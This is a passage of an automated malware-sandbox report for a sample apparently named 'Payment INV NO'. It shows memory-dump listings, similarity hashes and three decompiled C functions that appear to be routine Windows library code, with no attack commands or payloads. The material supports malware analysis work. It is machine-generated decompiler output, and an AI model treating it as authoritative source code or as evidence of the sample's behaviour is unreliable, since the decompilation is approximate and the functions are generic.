                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                          • Instruction ID: d1137118eb0e31ae8f4d97d0c86e49fdb0cc663dfc49fbf0bc6f2fcf6ced1655
                                                          • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                          • Instruction Fuzzy Hash: C1510030A04249EFEB25CB6CC0D07AFFBB1EF85314F5882A8D54597382C776A989C791
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0179E746 Relevance: .1, Instructions: 139COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 92%
                                                          			E0179E746(intOrPtr __ecx, void* __edx, void* __eflags) {
				unsigned int _v8;
				char _v12;
				char _v16;
				unsigned int _v20;
				unsigned int _v24;
				intOrPtr _v28;
				char _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t42;
				signed int _t45;
				unsigned int _t49;
				signed int _t50;
				signed int _t56;
				void* _t57;
				intOrPtr _t60;
				intOrPtr _t62;
				signed int _t64;
				signed int _t67;
				unsigned int _t68;
				signed int _t70;
				intOrPtr _t72;
				signed int _t74;
				signed int _t75;
				signed int _t76;
				signed int _t78;
				void* _t82;
				intOrPtr _t85;
				signed int _t86;
				void* _t87;
				signed int _t88;

				_t86 = 0;
				_v12 = 7;
				_v24 = 0;
				_t62 = __ecx;
				_v20 = 0;
				_t87 = __edx;
				_v28 = __ecx;
				_v8 = 0;
				_v16 = 0;
				E017DBB40(__ecx,  &_v36, 0x1774db8);
				_push(__ecx);
				_t42 = E0179F018(_t87,  &_v36,  &_v12, 0,  &_v8);
				if(_t42 != 0xc0000034) {
					_t67 = _v8;
					__eflags = _t67;
					if(_t67 == 0) {
						goto L1;
					}
					__eflags = _t42 - 0x80000005;
					if(_t42 != 0x80000005) {
						goto L1;
					}
					_t68 = _t67 + 2;
					_v8 = _t68;
					_t70 = _t68 + 0x00000003 & 0xfffffffc;
					__eflags = _t70;
					if(_t70 != 0) {
						_t42 = E017B4620(_t70,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t70);
						_t86 = _t42;
					}
					__eflags = _t86;
					if(_t86 == 0) {
						goto L1;
					}
					_push(_t70);
					_t45 = E0179F018(_t87,  &_v36,  &_v12, _t86,  &_v8);
					__eflags = _t45;
					if(_t45 != 0) {
						L22:
						return E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t86);
					}
					__eflags = _v12 - 1;
					if(_v12 == 1) {
						L10:
						_t88 = _t86;
						_t49 = _v8 >> 1;
						__eflags = _t49;
						_t72 = 0;
						_v8 = _t49;
						_v12 = _t72;
						if(_t49 == 0) {
							goto L22;
						}
						_t64 = _t62 + 0x14;
						__eflags = _t64;
						while(1) {
							__eflags = _t88;
							if(_t88 == 0) {
								goto L22;
							}
							__eflags =  *_t88 - _t72;
							if( *_t88 == _t72) {
								goto L22;
							}
							_t50 = E017DE490(_t88, 0x178e3f8);
							_pop(_t74);
							__eflags = _t50;
							if(_t50 == 0) {
								_t75 = _t74 | 0xffffffff;
								__eflags = _t75;
								 *(_v28 + 0x14) = _t75;
								goto L22;
							}
							E017DBB40(_t74,  &_v36, _t88);
							_push( &_v16);
							_push(0xa);
							_push( &_v36);
							_t56 = E017D13C0(_t64, _t86, _t88, __eflags);
							__eflags = _t56;
							if(_t56 != 0) {
								L17:
								_t76 = _t88;
								_t28 = _t76 + 2; // 0x2
								_t82 = _t28;
								do {
									_t57 =  *_t76;
									_t76 = _t76 + 2;
									__eflags = _t57 - _v24;
								} while (_t57 != _v24);
								_t78 = _t76 - _t82 >> 1;
								_t85 = _v12 + 1 + _t78;
								_v12 = _t85;
								_t88 = _t88 + _t78 * 2 + 2;
								_t72 = 0;
								__eflags = _t85 - _v8;
								if(_t85 < _v8) {
									continue;
								}
								goto L22;
							}
							 *_t64 = _v16;
							_t64 = _t64 + 2;
							_t60 = _v20 + 1;
							_v20 = _t60;
							__eflags = _t60 - 4;
							if(_t60 >= 4) {
								goto L22;
							}
							goto L17;
						}
						goto L22;
					}
					__eflags = _v12 - 7;
					if(_v12 != 7) {
						goto L22;
					}
					goto L10;
				}
				L1:
				return _t42;
			}




































                                                          0x0179e751
                                                          0x0179e753
                                                          0x0179e762
                                                          0x0179e765
                                                          0x0179e767
                                                          0x0179e76b
                                                          0x0179e76d
                                                          0x0179e770
                                                          0x0179e773
                                                          0x0179e776
                                                          0x0179e77b
                                                          0x0179e78a
                                                          0x0179e794
                                                          0x017f550d
                                                          0x017f5510
                                                          0x017f5512
                                                          0x00000000
                                                          0x00000000
                                                          0x017f5518
                                                          0x017f551d
                                                          0x00000000
                                                          0x00000000
                                                          0x017f5523
                                                          0x017f5526
                                                          0x017f552c
                                                          0x017f552c
                                                          0x017f552f
                                                          0x017f553d
                                                          0x017f5542
                                                          0x017f5542
                                                          0x017f5544
                                                          0x017f5546
                                                          0x00000000
                                                          0x00000000
                                                          0x017f554c
                                                          0x017f555b
                                                          0x017f5560
                                                          0x017f5562
                                                          0x017f561a
                                                          0x00000000
                                                          0x017f5627
                                                          0x017f5568
                                                          0x017f556c
                                                          0x017f5578
                                                          0x017f557b
                                                          0x017f557f
                                                          0x017f557f
                                                          0x017f5581
                                                          0x017f5582
                                                          0x017f5585
                                                          0x017f5588
                                                          0x00000000
                                                          0x00000000
                                                          0x017f558e
                                                          0x017f558e
                                                          0x017f5591
                                                          0x017f5591
                                                          0x017f5593
                                                          0x00000000
                                                          0x00000000
                                                          0x017f5599
                                                          0x017f559c
                                                          0x00000000
                                                          0x00000000
                                                          0x017f55a4
                                                          0x017f55aa
                                                          0x017f55ab
                                                          0x017f55ad
                                                          0x017f5613
                                                          0x017f5613
                                                          0x017f5616
                                                          0x00000000
                                                          0x017f5616
                                                          0x017f55b4
                                                          0x017f55bc
                                                          0x017f55bd
                                                          0x017f55c2
                                                          0x017f55c3
                                                          0x017f55c8
                                                          0x017f55ca
                                                          0x017f55e2
                                                          0x017f55e2
                                                          0x017f55e4
                                                          0x017f55e4
                                                          0x017f55e7
                                                          0x017f55e7
                                                          0x017f55ea
                                                          0x017f55ed
                                                          0x017f55ed
                                                          0x017f55f8
                                                          0x017f55fb
                                                          0x017f55ff
                                                          0x017f5605
                                                          0x017f5608
                                                          0x017f5609
                                                          0x017f560c
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x017f560e
                                                          0x017f55d0
                                                          0x017f55d3
                                                          0x017f55d9
                                                          0x017f55da
                                                          0x017f55dd
                                                          0x017f55e0
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x017f55e0
                                                          0x00000000
                                                          0x017f5591
                                                          0x017f556e
                                                          0x017f5572
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x017f5572
                                                          0x0179e7a0
                                                          0x0179e7a0

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0ae929afe3424d845cb80646d0e1fffd7a1e767c9d395e369e22ac526f9551e4
                                                          • Instruction ID: 9e0969d88cb8c6b6ac63198762562302466f38d5e6465b4be7ee51b8ed3b3b63
                                                          • Opcode Fuzzy Hash: 0ae929afe3424d845cb80646d0e1fffd7a1e767c9d395e369e22ac526f9551e4
                                                          • Instruction Fuzzy Hash: 8F41AF75900209ABDF25DF98D884AEFFBB9EF44B10F14415EEA15E7244D6309A45CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01795050 Relevance: .1, Instructions: 133COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 96%
                                                          			E01795050(void* _a4) {
				char _v24;
				signed int _v28;
				void* _v30;
				signed int _v32;
				void* _v44;
				void* _v46;
				void* _v48;
				void* _v52;
				void* _v60;
				void* _v72;
				intOrPtr _t34;
				short _t36;
				signed int _t38;
				signed short _t41;
				signed int _t51;
				short _t60;
				intOrPtr _t68;
				intOrPtr _t73;
				signed int _t77;
				short _t78;
				short _t79;
				signed char _t80;
				signed int _t81;
				void* _t83;

				_t83 = (_t81 & 0xfffffff8) - 0x1c;
				_t34 =  *[fs:0x30];
				_t58 =  *((intOrPtr*)(_t34 + 0x18));
				_t73 =  *((intOrPtr*)(_t34 + 0x10));
				_v28 =  *((intOrPtr*)(_t34 + 0x18));
				if(E0179519E(_a4) != 0) {
					_t36 = 0;
					L14:
					return _t36;
				}
				_t62 = _a4;
				if(E017B74C0(_a4) != 0) {
					_t36 = 0xc0000103;
				} else {
					_t77 =  *(_t73 + 0x26) & 0x0000ffff;
					while(1) {
						_t38 = E017B4620(_t62, _t58, 0, _t77);
						_v28 = _t38;
						if(_t38 == 0) {
							break;
						}
						 *((short*)(_t83 + 0x18)) = 0;
						if(_t77 > 0xffff) {
							 *(_t83 + 0x1a) = 0xffff;
							L25:
							_t78 = 0xc0000095;
							L26:
							E017B77F0(_t58, 0, _t38);
							_t36 = _t78;
							goto L14;
						}
						 *(_t83 + 0x1a) = _t77;
						_t79 = E017B6E30(_a4, _t77, _t38, 0, 0, _t83 + 0x20);
						if(_t79 == 0) {
							_t78 = 0xc0000033;
							L23:
							_t38 =  *((intOrPtr*)(_t83 + 0x1c));
							goto L26;
						}
						_t41 =  *(_t83 + 0x1a);
						_t62 = (_t41 & 0x0000ffff) - 4;
						if(_t79 > (_t41 & 0x0000ffff) - 4) {
							__eflags =  *((char*)( *[fs:0x30] + 3));
							if(__eflags >= 0) {
								_t41 =  *(_t83 + 0x1a);
								goto L7;
							}
							E017B77F0(_t58, 0,  *((intOrPtr*)(_t83 + 0x1c)));
							_t77 = _t79 + 4;
							continue;
						}
						L7:
						_t71 = _t41 & 0x0000ffff;
						if(_t79 > (_t41 & 0x0000ffff)) {
							_t78 = 0xc0000106;
							goto L23;
						}
						_t91 = _t79 - 0xffff;
						if(_t79 > 0xffff) {
							 *((short*)(_t83 + 0x18)) = 0xffff;
							_t38 =  *((intOrPtr*)(_t83 + 0x1c));
							goto L25;
						}
						 *((short*)(_t83 + 0x18)) = _t79;
						_t60 = E017CF0BF(_t83 + 0x1c, _t71, _t91,  &_v24);
						E017B77F0(_v32, 0,  *((intOrPtr*)(_t83 + 0x1c)));
						if(_t60 >= 0) {
							E017AEEF0(0x18879a0);
							_t68 = _v28;
							_t80 =  *0x1888210; // 0x1262cb0
							 *((intOrPtr*)(_t73 + 0x2c)) =  *((intOrPtr*)(_t68 + 4));
							 *((intOrPtr*)(_t73 + 0x28)) =  *((intOrPtr*)(_t68 + 0x10));
							 *((short*)(_t73 + 0x24)) =  *((intOrPtr*)(_t68 + 0xc));
							 *0x1888210 = _t68;
							_t51 = E017AEB70(_t68, 0x18879a0);
							if(_t80 != 0) {
								asm("lock xadd [esi], eax");
								if((_t51 | 0xffffffff) == 0) {
									_push( *((intOrPtr*)(_t80 + 4)));
									E017D95D0();
									E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t80);
								}
							}
						}
						_t36 = _t60;
						goto L14;
					}
					_t36 = 0xc0000017;
				}
			}



























                                                          0x01795058
                                                          0x0179505b
                                                          0x01795066
                                                          0x0179506a
                                                          0x0179506d
                                                          0x01795078
                                                          0x0179519a
                                                          0x01795191
                                                          0x01795197
                                                          0x01795197
                                                          0x0179507e
                                                          0x01795088
                                                          0x017f0c21
                                                          0x0179508e
                                                          0x0179508e
                                                          0x01795092
                                                          0x01795096
                                                          0x0179509b
                                                          0x017950a1
                                                          0x00000000
                                                          0x00000000
                                                          0x017950ae
                                                          0x017950b5
                                                          0x017f0c72
                                                          0x017f0c77
                                                          0x017f0c77
                                                          0x017f0c7c
                                                          0x017f0c80
                                                          0x017f0c85
                                                          0x00000000
                                                          0x017f0c85
                                                          0x017950bf
                                                          0x017950d4
                                                          0x017950d8
                                                          0x017f0c67
                                                          0x017f0c6c
                                                          0x017f0c6c
                                                          0x00000000
                                                          0x017f0c6c
                                                          0x017950de
                                                          0x017950e6
                                                          0x017950eb
                                                          0x017f0c31
                                                          0x017f0c35
                                                          0x017f0c4b
                                                          0x00000000
                                                          0x017f0c4b
                                                          0x017f0c3e
                                                          0x017f0c43
                                                          0x00000000
                                                          0x017f0c43
                                                          0x017950f1
                                                          0x017950f1
                                                          0x017950f6
                                                          0x017f0c55
                                                          0x00000000
                                                          0x017f0c55
                                                          0x01795101
                                                          0x01795103
                                                          0x017f0c5c
                                                          0x017f0c61
                                                          0x00000000
                                                          0x017f0c61
                                                          0x0179510d
                                                          0x01795120
                                                          0x01795128
                                                          0x0179512f
                                                          0x01795136
                                                          0x0179513b
                                                          0x0179513f
                                                          0x0179514d
                                                          0x01795153
                                                          0x0179515a
                                                          0x0179515e
                                                          0x01795164
                                                          0x0179516b
                                                          0x01795170
                                                          0x01795174
                                                          0x01795176
                                                          0x01795179
                                                          0x0179518a
                                                          0x0179518a
                                                          0x01795174
                                                          0x0179516b
                                                          0x0179518f
                                                          0x00000000
                                                          0x0179518f
                                                          0x017f0c8c
                                                          0x017f0c8c

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c7d568b2455a35a673670d39f6737b5978149d0292060a26a6085cdcaf003257
                                                          • Instruction ID: 784c6458fe9b72268595a9ecc9be540380968f2bfed530b1b3892ddc0095bb10
                                                          • Opcode Fuzzy Hash: c7d568b2455a35a673670d39f6737b5978149d0292060a26a6085cdcaf003257
                                                          • Instruction Fuzzy Hash: ED4104766443129BC725EF28D884BABFBA5AF94710F10092DFA958B381E730DC45C7D5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01791618 Relevance: .1, Instructions: 132COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 97%
                                                          			E01791618(void* __ebx, intOrPtr* __ecx, intOrPtr* __edx, void* __edi, void* __esi, void* __eflags) {
				signed char _t45;
				short _t49;
				signed int _t58;
				signed short _t60;
				signed char _t64;
				intOrPtr* _t74;
				intOrPtr* _t75;
				signed short _t77;
				signed short* _t79;
				signed short _t80;
				signed short _t85;
				intOrPtr _t88;
				signed char _t92;
				intOrPtr* _t94;
				signed char _t95;
				void* _t97;

				_t75 = __ecx;
				_push(0x2c);
				_push(0x186f2a8);
				E017ED08C(__ebx, __edi, __esi);
				_t94 = __edx;
				 *((intOrPtr*)(_t97 - 0x38)) = __edx;
				_t74 = __ecx;
				 *((intOrPtr*)(_t97 - 0x34)) = __ecx;
				if(E01791783(__ecx) == 0) {
					_t45 = 0xc000000d;
					L13:
					return E017ED0D1(_t45);
				}
				_t92 = 0;
				 *((intOrPtr*)(_t97 - 4)) = 0;
				if(E017D1310(__edx, _t97 - 0x1c) != 0) {
					_t49 =  *((intOrPtr*)(_t97 - 0x1c));
					__eflags = _t49 - 0xc000;
					if(_t49 >= 0xc000) {
						_t49 = 0;
						 *((short*)(_t97 - 0x1c)) = 0;
						_t95 = 0xc000000d;
					} else {
						_t95 = 0;
					}
					 *((intOrPtr*)(_t97 - 0x20)) = _t95;
					_t77 =  *(_t97 + 8);
					__eflags = _t77;
					if(_t77 != 0) {
						 *_t77 = _t49;
					}
					L12:
					 *((intOrPtr*)(_t97 - 4)) = 0xfffffffe;
					E017AFFB0(_t74, _t92,  *((intOrPtr*)(_t97 - 0x34)) + 8);
					_t45 = _t95;
					goto L13;
				}
				if( *_t94 == 0) {
					_t95 = 0xc0000033;
					L11:
					 *((intOrPtr*)(_t97 - 0x20)) = _t95;
					goto L12;
				}
				_t78 = _t74;
				_t95 = E0179187D(_t74, _t94, _t75, _t97 - 0x2c, _t97 - 0x24, _t97 - 0x30, _t97 - 0x28);
				 *((intOrPtr*)(_t97 - 0x20)) = _t95;
				if(_t95 < 0) {
					goto L12;
				}
				_t88 =  *((intOrPtr*)(_t97 - 0x28));
				if(_t88 != 0) {
					_t79 =  *(_t97 - 0x30);
					_t58 =  *_t79 & 0x0000ffff;
					__eflags = _t58 - 0xffff;
					if(_t58 == 0xffff) {
						_t79[1] = _t79[1] | 0x00000001;
					} else {
						_t60 = _t58 + 1;
						__eflags = _t60;
						 *_t79 = _t60;
					}
					_t80 =  *(_t97 + 8);
					__eflags = _t80;
					if(_t80 != 0) {
						 *_t80 =  *((intOrPtr*)(_t88 + 6));
					}
					_t95 = _t92;
					goto L11;
				}
				_t106 =  *((intOrPtr*)(_t97 - 0x2c)) - _t88;
				if( *((intOrPtr*)(_t97 - 0x2c)) == _t88) {
					_t95 = 0xc000000d;
					goto L11;
				}
				_t95 = 0xc0000017;
				 *((intOrPtr*)(_t97 - 0x20)) = 0xc0000017;
				_t92 = E01791BE9( *(_t97 - 0x24), _t97 - 0x30, _t106, _t78);
				 *((intOrPtr*)(_t97 - 0x28)) = _t92;
				if(_t92 == 0) {
					goto L12;
				}
				_t18 = _t92 + 0xe; // 0xe
				E017DF3E0(_t18,  *((intOrPtr*)(_t97 - 0x38)),  *(_t97 - 0x24));
				_t64 =  *(_t97 - 0x24) >> 1;
				 *(_t92 + 0xc) = _t64;
				 *((short*)(_t92 + 0xe + (_t64 & 0x000000ff) * 2)) = 0;
				if(E01791A30(_t74, _t92) == 0) {
					E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t92);
					_t95 =  *((intOrPtr*)(_t97 - 0x20));
					goto L12;
				}
				 *(_t92 + 6) = 0x0000c000 |  *(_t92 + 4);
				 *((intOrPtr*)( *((intOrPtr*)(_t97 - 0x2c)))) = _t92;
				_t85 =  *(_t97 + 8);
				if(_t85 != 0) {
					 *_t85 =  *(_t92 + 6);
				}
				_t95 = 0;
				goto L11;
			}



















                                                          0x01791618
                                                          0x01791618
                                                          0x0179161a
                                                          0x0179161f
                                                          0x01791624
                                                          0x01791626
                                                          0x01791629
                                                          0x0179162b
                                                          0x01791635
                                                          0x017eef1c
                                                          0x01791722
                                                          0x01791727
                                                          0x01791727
                                                          0x0179163b
                                                          0x0179163d
                                                          0x0179164c
                                                          0x01791755
                                                          0x01791759
                                                          0x0179175c
                                                          0x0179176f
                                                          0x01791771
                                                          0x01791775
                                                          0x0179175e
                                                          0x0179175e
                                                          0x0179175e
                                                          0x01791760
                                                          0x01791763
                                                          0x01791766
                                                          0x01791768
                                                          0x0179176a
                                                          0x0179176a
                                                          0x0179170d
                                                          0x0179170d
                                                          0x0179171b
                                                          0x01791720
                                                          0x00000000
                                                          0x01791720
                                                          0x01791655
                                                          0x017eef26
                                                          0x0179170a
                                                          0x0179170a
                                                          0x00000000
                                                          0x0179170a
                                                          0x0179166e
                                                          0x01791675
                                                          0x01791677
                                                          0x0179167c
                                                          0x00000000
                                                          0x00000000
                                                          0x01791682
                                                          0x01791687
                                                          0x0179172a
                                                          0x0179172d
                                                          0x01791735
                                                          0x01791738
                                                          0x0179177c
                                                          0x0179173a
                                                          0x0179173a
                                                          0x0179173a
                                                          0x0179173b
                                                          0x0179173b
                                                          0x0179173e
                                                          0x01791741
                                                          0x01791743
                                                          0x01791749
                                                          0x01791749
                                                          0x0179174c
                                                          0x00000000
                                                          0x0179174c
                                                          0x0179168d
                                                          0x01791690
                                                          0x017eef49
                                                          0x00000000
                                                          0x017eef49
                                                          0x01791696
                                                          0x0179169b
                                                          0x017916aa
                                                          0x017916ac
                                                          0x017916b1
                                                          0x00000000
                                                          0x00000000
                                                          0x017916b9
                                                          0x017916bd
                                                          0x017916c8
                                                          0x017916ca
                                                          0x017916d2
                                                          0x017916e2
                                                          0x017eef3c
                                                          0x017eef41
                                                          0x00000000
                                                          0x017eef41
                                                          0x017916f1
                                                          0x017916f8
                                                          0x017916fa
                                                          0x017916ff
                                                          0x01791705
                                                          0x01791705
                                                          0x01791708
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
